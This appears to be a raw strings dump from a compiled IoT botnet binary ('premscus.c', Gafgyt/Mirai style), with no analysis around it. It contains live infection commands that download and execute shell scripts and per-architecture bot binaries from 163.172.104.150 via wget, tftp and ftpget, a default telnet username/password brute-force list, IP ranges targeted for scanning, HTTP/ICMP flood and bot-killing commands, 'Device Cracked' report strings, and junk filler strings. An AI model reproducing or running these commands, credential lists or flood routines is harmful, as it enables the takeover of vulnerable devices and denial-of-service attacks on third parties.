PTRh
QVhy
VUUU
)9S_
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuT
<ru3
<[^_]
L[^_]
L[^_]
[^_]
<,u 
[^_]
[^_]
WVSQ
PRQW
T$(S
T$(S
t$(j
UWVS
[^_]
UWVS
[^_]
QPRS
^8PSh
t$,V
t$$S
[^_]
UWVS
T$`~
L$,1
D$(%
WVPR
$VRP
?0u,
VVh6-
D$ P
PRQQ
[^_]
tR~P
tB~@=
UWVS
<$u0
\$L9
~	<mtN
:*u4
L$pE
D$`P
T$\)
\[^_]
AIt	
UWVS
[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
\$HPh
D$)P
RVSh:
D$ P
D$$Ph
UWVS
t$xSU
t$xj
t$hW
\$DS
T$@XZ
D$TPhH\
E$RWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
xAPPSh@X
UWVS
\$ThP
D$8P
T$ ~
#t$ 
2#D$ 
D$8P
[^_]
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
\$ S
D$,Ph
UWVS
[^_]
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@h
D$4j
ET$,
UWVS
 <xu
(<`v
}/C9
D$, D$
t$$h@
u%WWSS
ZYSS
[^_]
yPPj
PPShl
UWVS
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
[^_]
UWVS
)\$(
[^_]
UWVS
wcQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
u'z%
u?z=
D$Pp
l$61
D$(RP
D$'g
D$'f
\$'t
D$\p
|$d|4
|$'ftt
T$H~@
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7h
T$8XZj
\$PS
D$$;
}3Ph
t$(j
D$$f
D$LPU
D$89
uOQhh
XZKj
9\$$}
PCPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$<^_
uDQhh
XZKj
9\$$}
D$(@
T$(u
tMQh
T$8f
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
UWVS
^8QSh
D$(P
D$(P
[^_]
UWVS
T$$v
^8PSh
D$(PV
x:RW
D$(PV
[^_]
UWVS
<rt><w
t7<af
E4tmPhD
t$(V
[^_]
^8QSh
D$ P
Z %0
D$ P
^8PSh
[^_]
UWVS
[^_]
PVWS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQGQVh
u+Rj
D$$P
,[^_]
UWV1
D$+1
|<+0u&
D<+t)
|$7W
<[^_]
UWVS
Pj j
D$HP
;D$|v
!WWR
[^_]
UWVS
[^_]
UWVS
D$0t 
PPj#
u,PP
t$4U
[^_]
UWVS1
YRRj.W
D$()
[^_]
UWVS
G;|$,
s^PS
[^_]
163.172.104.150
cd /tmp; rm -fr *; wget http://163.172.104.150/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 163.172.104.150 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 163.172.104.150; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.104.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
cd /tmp; rm -fr *; busybox wget http://163.172.104.150/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 163.172.104.150 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 163.172.104.150; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 163.172.104.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
cd /tmp; wget http://163.172.104.150/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit
Do nine men interpret Nine men I nod
AAAAAAAAnetcore
 cd /var/; rm -rf sshd; wget http://163.172.104.150/jackmymipsel || tftp -r jackmymipsel -g 163.172.104.150; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel
mips
mips64
mipsel
sh2eb
sh2elf
armv5
armv4tl
armv4
armv6
i686
powerpc
powerpc440fp
i586
m68k
sparc
x86_64
jackmymips
jackmymips64
jackmymipsel
jackmysh2eb
jackmysh2elf
jackmysh4
jackmyx86
jackmyarmv5
jackmyarmv4tl
jackmyarmv4
jackmyarmv6
jackmyi686
jackmypowerpc
jackmypowerpc440fp
jackmyi586
jackmym68k
jackmysparc
jackmyx86_64
hackmymips
hackmymips64
hackmymipsel
hackmysh2eb
hackmysh2elf
hackmysh4
hackmyx86
hackmyarmv5
hackmyarmv4tl
hackmyarmv4
hackmyarmv6
hackmyi686
hackmypowerpc
hackmypowerpc440fp
hackmyi586
hackmym68k
hackmysparc
hackmyx86_64
busyboxterrorist
DFhxdhdf
dvrHelper
FDFDHFC
FEUB
FTUdftui
GHfjfgvj
jhUOH
JIPJIPJj
JIPJuipjh
kmymips
kmymips64
kmymipsel
kmysh2eb
kmysh2elf
kmysh4
kmyx86
kmyarmv5
kmyarmv4tl
kmyarmv4
kmyarmv6
kmyi686
kmypowerpc
kmypowerpc440fp
kmyi586
kmym68k
kmysparc
kmyx86_64
lolmips
lolmips64
lolmipsel
lolsh2eb
lolsh2elf
lolsh4
lolx86
lolarmv5
lolarmv4tl
lolarmv4
lolarmv6
loli686
lolpowerpc
lolpowerpc440fp
loli586
lolm68k
lolsparc
RYrydry
telmips
telmips64
telmipsel
telsh2eb
telsh2elf
telsh4
telx86
telarmv5
telarmv4tl
telarmv4
telarmv6
teli686
telpowerpc
telpowerpc440fp
teli586
telm68k
telsparc
telx86_64
TwoFacemips
TwoFacemips64
TwoFacemipsel
TwoFacesh2eb
TwoFacesh2elf
TwoFacesh4
TwoFacex86
TwoFacearmv5
TwoFacearmv4tl
TwoFacearmv4
TwoFacearmv6
TwoFacei686
TwoFacepowerpc
TwoFacepowerpc440fp
TwoFacei586
TwoFacem68k
TwoFacesparc
TwoFacex86_64
UYyuyioy
XDzdfxzf
xxb1
xxb2
xxb3
xxb4
xxb5
xxb6
Eleele
xxb7
xxb8
xxb9
xxb10
xxb11
xxb12
xxb13
xxb14
xxb15
xxb16
xxb17
xxb18
xxb19
xxb20
busybotnet
pppd
pppoe
wput
root
support
telnet
admin
user
guest
admin1
administrator
Administrator
666666
888888
ubnt
tech
mother
service
supervisor
zyxel
xc3511
vizxv
xmhdipc
default
juantech
123456
54321
12345
pass
admin1234
1111
smcadmin
1234
password
klv123
klv1234
Zte521
hi3518
jvbzd
anko
zlxx.
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm
fucker
ogin
sername
assword
Linux
9615-cdp
nvalid
ailed
ncorrect
enied
rror
oodbye
BusyBox
busybox
shell
built-in
help
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
nwonknu
unknown
hello
slammed
Machines
Dank
Layer4
hhfdhkhbhcace
flood
ugiydg
IOHEDU9S
SIAHDIYSGBILC
DSFDD
DVAS
EFFAESF
uhdusaibxi
OIEDNBOUBAS
WQIJOIWENASO
pkpinasoubc
wubihbdc
inopxuob
wubiddsd
savduhvaU
UHyig732vgux
UByovoouds
saybuyyyywugav
sdjbciysvhdaocu
dsibciwveas
dsygc8y32723
tydjtr
tfkyt
rsyreg
HCKG
uibeiubf
YRXDJR
YIFUKT
YCJYRX
7TUFF
dsgdf
idsh
gffag
gfdag
fgadf
fbafdb
fbbbf
dfbdfb
fdbxb
BEDROLL
BEDSORE
BEETLED
BEETLES
BEHESTS
BEHOLDS
BENDERS
DELETES
DEBTORS
DUSTERS
ENSURED
EYELESS
EYELETS
HOLSTER
HUNTERS
LENDERS
HOTBEDS
LUSHEST
sudo
http
request
socket
create
Merry
holidays
vdeubhs
G8WGVSI
VUSAVXU
28H9UgBGvv
IYVkhj
uiVU
super
user
26736
18h3b2
Kekz
wrecked
Unix
Strings
Manipulation
Command
Line
edew
apt-get
ewdb
ubed
iyvugvjvkh
HBiug655
KJYDFyljf754
hbjhvihk
guygiuov
ugyi
iyfutvugjiu
hbivutfyrfvg
uivyuivug
khvihvgiug
jbihvbig
ubihkbvihyvigv
bivhkb
vejvbboqi
vobqre
odupubw
ftyduiy
hbilyfutdi
78tgyuhkbjg
tudiryxcvi
iygcduy
RTRTWFNJ
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
6mD4Q
Ck0Zt
6T1bg
joNuc
v9SNj
Fm74C
pXVcb
w472Y
vn6PH
Ycy7z
EraqpCtc
eQE9VqOO
0I2tFegb
c9vSbX37
HzullcDD
sQT6GUpo
SE5iiTRL
8YnpVkqQ
P4ZFrN8y
ZaygGQWy
4b9hcI2E0ob
NbOwbHGP1sv
Hot98t9cA1C
SmosSnBu3UI
6LhO2mqIaG2
wFKTDkBE12q
wr5RiFwx0oe
bKJDMfvjRK2
CXaCtbYiETK
HRvlWcOcb8v
SozDWxWE2jAWgGv
LO53SCJbVwKjAta
M6qlcepTThrOhl3
s4VIALs5l0Murlt
eHj9MDyMU2PoJ32
aLQP6OWncMD8Pq7
1zoihgOpu92HLUz
wZU4i9GsFjT3DXt
8SqliubwCJDq9fg
NBLlKNISq52KJNr
uewbdih
wqodbpdwdqw
Beeb
iqhdpuqhwb
close
keep-alive
accept
%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
ping %s -s %s -i %s -w %s
kill -9 $(pidof %s)
kill -9 $(pidof busybox
history -c
kill -9 %s
(null)
/bin/sh
PING
gethostbyname
:>%$#
%d.%d.%d.%d
41.140.%d.%d
41.141.%d.%d
41.142.%d.%d
41.143.%d.%d
41.248.%d.%d
41.249.%d.%d
41.250.%d.%d
41.251.%d.%d
105.154.%d.%d
105.155.%d.%d
105.156.%d.%d
105.157.%d.%d
105.158.%d.%d
105.159.%d.%d
160.176.%d.%d
160.177.%d.%d
160.178.%d.%d
160.179.%d.%d
196.64.%d.%d
196.65.%d.%d
196.70.%d.%d
196.74.%d.%d
196.75.%d.%d
196.77.%d.%d
196.89.%d.%d
196.217.%d.%d
185.142.%d.%d
185.154.%d.%d
5.158.%d.%d
109.238.%d.%d
185.121.%d.%d
5.172.%d.%d
119.157.%d.%d
119.150.%d.%d
God A red nugget A fat egg under a dog
119.151.%d.%d
119.152.%d.%d
119.153.%d.%d
119.154.%d.%d
119.155.%d.%d
119.156.%d.%d
119.158.%d.%d
119.159.%d.%d
191.24.%d.%d
187.119.%d.%d
177.215.%d.%d
152.241.%d.%d
182.185.%d.%d
179.80.%d.%d
179.81.%d.%d
179.82.%d.%d
179.83.%d.%d
179.84.%d.%d
179.86.%d.%d
179.87.%d.%d
179.88.%d.%d
179.89.%d.%d
179.90.%d.%d
179.91.%d.%d
179.92.%d.%d
179.93.%d.%d
179.94.%d.%d
179.95.%d.%d
179.96.%d.%d
179.97.%d.%d
179.98.%d.%d
179.99.%d.%d
152.240.%d.%d
152.242.%d.%d
152.243.%d.%d
152.244.%d.%d
152.245.%d.%d
152.246.%d.%d
152.247.%d.%d
152.248.%d.%d
152.249.%d.%d
182.189.%d.%d
182.190.%d.%d
182.191.%d.%d
182.188.%d.%d
182.187.%d.%d
182.186.%d.%d
182.184.%d.%d
179.100.%d.%d
179.101.%d.%d
179.102.%d.%d
179.103.%d.%d
179.110.%d.%d
179.111.%d.%d
179.112.%d.%d
179.113.%d.%d
179.114.%d.%d
179.115.%d.%d
179.116.%d.%d
179.117.%d.%d
191.193.%d.%d
191.194.%d.%d
191.195.%d.%d
191.196.%d.%d
191.197.%d.%d
191.198.%d.%d
152.250.%d.%d
152.251.%d.%d
152.252.%d.%d
152.253.%d.%d
152.254.%d.%d
152.255.%d.%d
177.112.%d.%d
177.113.%d.%d
177.114.%d.%d
177.115.%d.%d
177.116.%d.%d
177.117.%d.%d
177.118.%d.%d
177.119.%d.%d
177.120.%d.%d
177.121.%d.%d
177.138.%d.%d
177.139.%d.%d
177.144.%d.%d
177.145.%d.%d
177.146.%d.%d
177.147.%d.%d
177.160.%d.%d
177.161.%d.%d
177.162.%d.%d
177.163.%d.%d
177.168.%d.%d
177.169.%d.%d
177.170.%d.%d
177.171.%d.%d
177.172.%d.%d
189.96.%d.%d
189.97.%d.%d
189.98.%d.%d
189.99.%d.%d
39.34.%d.%d
59.103.%d.%d
191.12.%d.%d
186.117.%d.%d
179.131.%d.%d
179.129.%d.%d
179.170.%d.%d
191.206.%d.%d
187.118.%d.%d
187.116.%d.%d
179.224.%d.%d
179.166.%d.%d
admin
[31mPhone Cracked 
[32m-> 
[37m%s | 
[31mUsername 
[32m-> 
[37madmin | 
[31mPassword 
[32m-> 
[37madmin
REPORT %s:admin:admin
oelinux123
[36mDevice Cracked 
[32m-> 
[37m%s | 
[36mUsername 
[32m-> 
[37m%s | 
[36mPassword 
[32m-> 
[37m%s
REPORT %s:%s:%s
PONG!
GETLOCALIP
My IP: %s
BOTKILL
Killing Bots
SCANNER
SCANNER ON | OFF
[TELNET] SCANNER OFF:%s
[TELNET] SCANNER ON:%s
RANGE
RANGE <option 1-2>
Range %d->%d
NETIS
NETIS ON | OFF
[NETIS] SCANNER OFF:%s
[NETIS] SCANNER ON:%s
PHONE
PHONE ON | OFF
[PHONE] SCANNER OFF:%s
[PHONE] SCANNER ON:%s
ICMP
HTTP
STOP
ENDTHEBOTLOL
8.8.8.8
/proc/net/route
	00000000	
x86_32
ulimit -n 999999
/usr/bin/python
sshd
/usr/sbin/dropbear
PREMSCUS | TYPE -> %s
[35mPREMSCUS CONNECTED 
[36m-> 
[37m%s | 
[35mTYPE 
[36m-> 
[37m%s
PONG
MOVE
%s 2>&1
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
premscus.c
C.3.4252
C.0.4235
C.8.4297
i.4443
printchar
prints
printi
print
fdopen_pids
hextable
get_random_ip
ipState
libc/sysdeps/linux/i386/vfork.S
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
access.c
chdir.c
close.c
dup2.c
fork.c
getdtablesize.c
geteuid.c
getpid.c
getrlimit.c
Borrow or rob
ioctl.c
kill.c
open.c
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
printf.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4160
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4370
prefix.4371
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4372
qual_chars.4377
spec_chars.4373
spec_ranges.4374
spec_or_mask.4375
spec_and_mask.4376
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1330
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1278
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2931
inet_ntoa.c
buf.2827
inet_makeaddr.c
Tacocat
gethostbyname.c
buf.5162
h.5161
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3001
sigaction.c
__restore_rt
__restore
__syscall_error.c
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getegid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
sbrk.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fprintf.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memchr.c
memmove.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
dl-support.c
brk.c
poll.c
fclose.c
fopen.c
fseeko.c
fseeko64.c
_adjust_pos.c
_fopen.c
_cs_funcs.c
fgets.c
fflush_unlocked.c
fgets_unlocked.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3285
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
userID
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
sysconf
printf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
alula
__GI_strcasecmp
__GI_tolower
recv
connect
__encode_question
knownbots
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
__GI_setsid
Phonepid
memmove
sendTCP
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
phone2
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
usernames
sendUKNOWN
errno
getegid
read_until_response
__GI_sbrk
zprintf
NetisPid
__GI___uClibc_init
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
HackerScan1
wildString
__xpg_strerror_r
fcntl64
prctl
memcpy
makeRandomStr
__GI_fputs_unlocked
execl
__GI_fgets
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
